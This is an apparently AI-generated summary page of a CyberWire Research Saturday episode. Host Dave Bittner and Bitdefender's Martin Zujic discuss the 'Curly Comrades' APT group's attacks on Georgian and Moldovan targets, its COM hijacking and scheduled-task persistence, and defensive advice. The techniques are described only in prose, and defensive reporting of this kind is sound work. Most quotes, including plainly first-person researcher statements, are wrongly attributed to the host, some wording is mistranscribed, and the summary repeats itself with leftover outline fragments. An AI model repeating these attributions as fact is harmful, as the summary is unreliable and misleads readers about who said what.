CyberWire Daily: Research Saturday

Episode Title: Sunny-side spyware
Air Date: September 27, 2025
Host: Dave Bittner (N2K Networks)
Guest: Martin Zujic, Technical Solutions Director at Bitdefender
Research Discussed: "Curly Comrades: A New Threat Actor Targeting Geopolitical Hotbeds"

Episode Overview

This episode spotlights new Bitdefender research into “Curly Comrades,” an advanced persistent threat (APT) group targeting geopolitical hotspots at the junction of Europe and Russia. Dave Bittner and Martin Zujic break down the group’s tools, tactics, and operational sophistication, with special attention to innovative persistence mechanisms and the challenges of investigating stealthy, evolving cyber adversaries.

Key Discussion Points and Insights

1. Background: Identifying and Naming the Threat Group

Timeline & Methodology
- Bitdefender began tracking Curly Comrades in mid-2024, though their activities trace back to at least November 2023.
- Investigations covered multiple victims over several months to build a comprehensive understanding before releasing findings.
- Quote:
  
  “It’s normal when you see [research] released, let's say, half a year later... we try to get as complete picture as possible before we publish.”
  — Dave Bittner [02:01]
Name Origin
- The name "Curly Comrades" references both technical aspects (use of the curl.exe tool and hijacking COM objects) and a desire not to glamorize cybercriminals.
- Quote:
  
  “We... wanted to point out that these guys are not cool, they are cyber criminals.”
  — Dave Bittner [03:28]

2. Target Geography & Motivations

Victim Profile
- Focus on countries “geopolitically halfway between Russia and Europe” (e.g., government and judicial entities in Georgia and an energy distributor in Moldova).
- The actors leverage a wide, likely underestimated, network of legitimate but compromised websites as traffic relays.
Attack Objective
- Long-term data exploitation and sustained access.
- Quote:
  
  “Their focus is... judicial and government bodies in Georgia... energy distribution company in Moldova... using a large network of legitimate but compromised websites as traffic relays.”
  — Dave Bittner [04:17]

3. Techniques and Intrusion Lifecycle

Initial Access & Investigation
- The group’s entry method is unknown due to forensic gaps, a common scenario in threat monitoring.
- Activity was traced through artifacts and time-stamping evasions, establishing presence since November 2023.
Pivoting from Initial Detection
- First signs were attempts to deploy open-source "resource client" software.
- Discovery rapidly escalated as the attack scope became clear, including access via custom SOCKS5 servers and use of SSH, Stunnel, and multiple tunnels for persistence.
Quote:

“We don’t have any insights into initial access method they used... what triggered us here is that we detected an attempt to deploy a resource client... and quickly found out this is much bigger than just some isolated action.”
— Dave Bittner [05:59]

4. Persistence and Stealth: The MUCORE Agent

MUCORE Agent Mechanism
- A central discovery was their MUCORE Agent, a .NET program that triggers PowerShell payloads, employing a novel persistence technique.
- COM Hijacking: The agent hijacks a specific .NET-related COM handler by manipulating Windows Registry CLSIDs (class IDs), so that legitimate .NET activity will launch malicious payloads.
- Stealthy Activation:
  - Persistence is further obfuscated by abusing a Scheduled Task associated with the .NET Framework’s “engine” (the Native Image Generator for pre-compilation).
  - The scheduled task is disabled by default and only enabled by the system at unpredictable times (when the host is idle or after a .NET install), making the malware launch random and hard to detect.
  - After execution, the task disables itself, leaving few obvious traces.
Quote:

“Not only is it hijacking one of the con classes... but also, how is this triggered? That’s also smart because it’s relying on the scheduled task that is disabled, but just appears to be disabled, but it actually executes.”
— Dave Bittner [13:24]

5. Advanced Tactics & Infrastructure

Use of Legitimate Infrastructure
- Most command-and-control (C2) communications traveled through compromised, but otherwise legitimate, websites, providing cover and facilitating stealth.
- Layered proxying and multiple fallback tunnels ensured resilience and return paths for the attackers if evicted.
Shift from Malware to “Living off the Land”
- Transition away from custom malware to using built-in system tools (LOLbins) and standard protocols (SSH, Stunnel) for persistence and data exfiltration.
- Quote:
  
  “They are switching less and less to use malware and... more to use normal, common binaries.”
  — Dave Bittner [18:29]

6. Resilience and Operator Tactics

Multi-pronged Persistence
- Multiple access, redundancy in tunnels, legitimate tool use, and fallback mechanisms make defense and remediation extremely challenging.
Operational Security
- The sophistication and scope of the infrastructure indicate a skilled, well-resourced team with a long-term operational outlook.
- Quote:
  
  “They stayed stealthy, under the radar for a very, very long time. So yeah, it's much bigger than what we are seeing today.”
  — Dave Bittner [17:30]

7. Defensive Recommendations

EDR/XDR Deployment
- Major shortcomings in victim environments: lack of Endpoint Detection and Response (EDR/XDR), or tools generating excessive noise and leading to missed alerts.
Operational Readiness
- Investing in security personnel and processes is as vital as tooling—alerts must be followed up by trained SOC staff or third-party responders.
Alert Tuning & Continuous Research
- Focus on detecting suspicious behaviors, not just known malware.
- Stay updated with research on the latest persistence tricks, LOLbin (Living Off The Land) abuse, and new malicious RMM (Remote Monitoring and Management) use.
- Quotes:
  
  “It’s really good to think about it. It’s no longer binary, just this is bad or this is good. It’s all about percentages…”
  — Dave Bittner [19:57]
  “Make sure you have the tools that will highlight to you suspicious activity on the network, on endpoints, on servers, in the cloud. And also you have the people that can respond to it.”
  — Dave Bittner [21:18]
  “Be aware of LOL bins, be aware of RMM abuse by these directives.”
  — Dave Bittner [23:22]

Notable Quotes & Memorable Moments

On naming threat groups:

“We really wanted to find also the name that would reflect what we think about them. If it makes sense.”
— Dave Bittner [03:28]
On the challenges of initial access investigation:

“It’s forensic investigation is not like in the movie where you know exactly like every single step would happen and there are no gaps. In many cases there are big gaps.”
— Dave Bittner [05:59]
On the technical complexity and researcher frustration:

“If you’ve never been dealing with the COM object, congratulations. I spent many years fighting with the DLL hell back in my early days. So this is the stuff of nightmares.”
— Martin Zujic [08:52]

Timestamps for Important Segments

[01:41] Introduction to Curly Comrades threat group
[04:08] Targeted regions, sectors, and motivations
[05:49] Attack lifecycle and investigation obstacles
[08:42] Deep dive: Persistence via MUCORE agent and technical mechanisms
[13:24] Detailed explanation of COM hijacking and scheduled task abuse
[17:24] Sophistication assessment and stealth tactics
[18:22] Resilience and living-off-the-land tactics
[19:46] Defensive recommendations for organizations

Summary

This episode provides a meticulous breakdown of how Curly Comrades operates: focusing on stealthy persistence, innovative abuse of Windows internals, and use of legitimate infrastructure for command and control. The advanced, evasive nature of the threat underscores the continued evolution of APT operations and the critical need for organizations to pair technology with skilled personnel and continuous research to stay ahead.
The conversation is candid, technical, and rooted in practical experience, making it essential listening for defenders seeking actionable insight into modern cyber threats.

CyberWire Daily: Research Saturday

Episode Overview

Key Discussion Points and Insights

1. Background: Identifying and Naming the Threat Group

Timeline & Methodology
- Bitdefender began tracking Curly Comrades in mid-2024, though their activities trace back to at least November 2023.
- Investigations covered multiple victims over several months to build a comprehensive understanding before releasing findings.
- Quote:
  
  “It’s normal when you see [research] released, let's say, half a year later... we try to get as complete picture as possible before we publish.”
  — Dave Bittner [02:01]
Name Origin
- The name "Curly Comrades" references both technical aspects (use of the curl.exe tool and hijacking COM objects) and a desire not to glamorize cybercriminals.
- Quote:
  
  “We... wanted to point out that these guys are not cool, they are cyber criminals.”
  — Dave Bittner [03:28]

2. Target Geography & Motivations

Victim Profile
- Focus on countries “geopolitically halfway between Russia and Europe” (e.g., government and judicial entities in Georgia and an energy distributor in Moldova).
- The actors leverage a wide, likely underestimated, network of legitimate but compromised websites as traffic relays.
Attack Objective
- Long-term data exploitation and sustained access.
- Quote:
  
  “Their focus is... judicial and government bodies in Georgia... energy distribution company in Moldova... using a large network of legitimate but compromised websites as traffic relays.”
  — Dave Bittner [04:17]

3. Techniques and Intrusion Lifecycle

Initial Access & Investigation
- The group’s entry method is unknown due to forensic gaps, a common scenario in threat monitoring.
- Activity was traced through artifacts and time-stamping evasions, establishing presence since November 2023.
Pivoting from Initial Detection
- First signs were attempts to deploy open-source "resource client" software.
- Discovery rapidly escalated as the attack scope became clear, including access via custom SOCKS5 servers and use of SSH, Stunnel, and multiple tunnels for persistence.
Quote:

“We don’t have any insights into initial access method they used... what triggered us here is that we detected an attempt to deploy a resource client... and quickly found out this is much bigger than just some isolated action.”
— Dave Bittner [05:59]

4. Persistence and Stealth: The MUCORE Agent

MUCORE Agent Mechanism
- A central discovery was their MUCORE Agent, a .NET program that triggers PowerShell payloads, employing a novel persistence technique.
- COM Hijacking: The agent hijacks a specific .NET-related COM handler by manipulating Windows Registry CLSIDs (class IDs), so that legitimate .NET activity will launch malicious payloads.
- Stealthy Activation:
  - Persistence is further obfuscated by abusing a Scheduled Task associated with the .NET Framework’s “engine” (the Native Image Generator for pre-compilation).
  - The scheduled task is disabled by default and only enabled by the system at unpredictable times (when the host is idle or after a .NET install), making the malware launch random and hard to detect.
  - After execution, the task disables itself, leaving few obvious traces.
Quote:

“Not only is it hijacking one of the con classes... but also, how is this triggered? That’s also smart because it’s relying on the scheduled task that is disabled, but just appears to be disabled, but it actually executes.”
— Dave Bittner [13:24]

5. Advanced Tactics & Infrastructure

Use of Legitimate Infrastructure
- Most command-and-control (C2) communications traveled through compromised, but otherwise legitimate, websites, providing cover and facilitating stealth.
- Layered proxying and multiple fallback tunnels ensured resilience and return paths for the attackers if evicted.
Shift from Malware to “Living off the Land”
- Transition away from custom malware to using built-in system tools (LOLbins) and standard protocols (SSH, Stunnel) for persistence and data exfiltration.
- Quote:
  
  “They are switching less and less to use malware and... more to use normal, common binaries.”
  — Dave Bittner [18:29]

6. Resilience and Operator Tactics

Multi-pronged Persistence
- Multiple access, redundancy in tunnels, legitimate tool use, and fallback mechanisms make defense and remediation extremely challenging.
Operational Security
- The sophistication and scope of the infrastructure indicate a skilled, well-resourced team with a long-term operational outlook.
- Quote:
  
  “They stayed stealthy, under the radar for a very, very long time. So yeah, it's much bigger than what we are seeing today.”
  — Dave Bittner [17:30]

7. Defensive Recommendations

EDR/XDR Deployment
- Major shortcomings in victim environments: lack of Endpoint Detection and Response (EDR/XDR), or tools generating excessive noise and leading to missed alerts.
Operational Readiness
- Investing in security personnel and processes is as vital as tooling—alerts must be followed up by trained SOC staff or third-party responders.
Alert Tuning & Continuous Research
- Focus on detecting suspicious behaviors, not just known malware.
- Stay updated with research on the latest persistence tricks, LOLbin (Living Off The Land) abuse, and new malicious RMM (Remote Monitoring and Management) use.
- Quotes:
  
  “It’s really good to think about it. It’s no longer binary, just this is bad or this is good. It’s all about percentages…”
  — Dave Bittner [19:57]
  “Make sure you have the tools that will highlight to you suspicious activity on the network, on endpoints, on servers, in the cloud. And also you have the people that can respond to it.”
  — Dave Bittner [21:18]
  “Be aware of LOL bins, be aware of RMM abuse by these directives.”
  — Dave Bittner [23:22]

Notable Quotes & Memorable Moments

On naming threat groups:

“We really wanted to find also the name that would reflect what we think about them. If it makes sense.”
— Dave Bittner [03:28]
On the challenges of initial access investigation:

“It’s forensic investigation is not like in the movie where you know exactly like every single step would happen and there are no gaps. In many cases there are big gaps.”
— Dave Bittner [05:59]
On the technical complexity and researcher frustration:

“If you’ve never been dealing with the COM object, congratulations. I spent many years fighting with the DLL hell back in my early days. So this is the stuff of nightmares.”
— Martin Zujic [08:52]

Timestamps for Important Segments

[01:41] Introduction to Curly Comrades threat group
[04:08] Targeted regions, sectors, and motivations
[05:49] Attack lifecycle and investigation obstacles
[08:42] Deep dive: Persistence via MUCORE agent and technical mechanisms
[13:24] Detailed explanation of COM hijacking and scheduled task abuse
[17:24] Sophistication assessment and stealth tactics
[18:22] Resilience and living-off-the-land tactics
[19:46] Defensive recommendations for organizations

wavePod

Sunny-side spyware. [Research Saturday]

Powered by Wave AI

Summary

CyberWire Daily: Research Saturday

Episode Overview

Key Discussion Points and Insights

1. Background: Identifying and Naming the Threat Group

2. Target Geography & Motivations

3. Techniques and Intrusion Lifecycle

4. Persistence and Stealth: The MUCORE Agent

5. Advanced Tactics & Infrastructure

6. Resilience and Operator Tactics

7. Defensive Recommendations

Notable Quotes & Memorable Moments

Timestamps for Important Segments

Summary

Summary

CyberWire Daily: Research Saturday

Episode Overview

Key Discussion Points and Insights

1. Background: Identifying and Naming the Threat Group

2. Target Geography & Motivations

3. Techniques and Intrusion Lifecycle

4. Persistence and Stealth: The MUCORE Agent

5. Advanced Tactics & Infrastructure

6. Resilience and Operator Tactics

7. Defensive Recommendations

Notable Quotes & Memorable Moments

Timestamps for Important Segments

Summary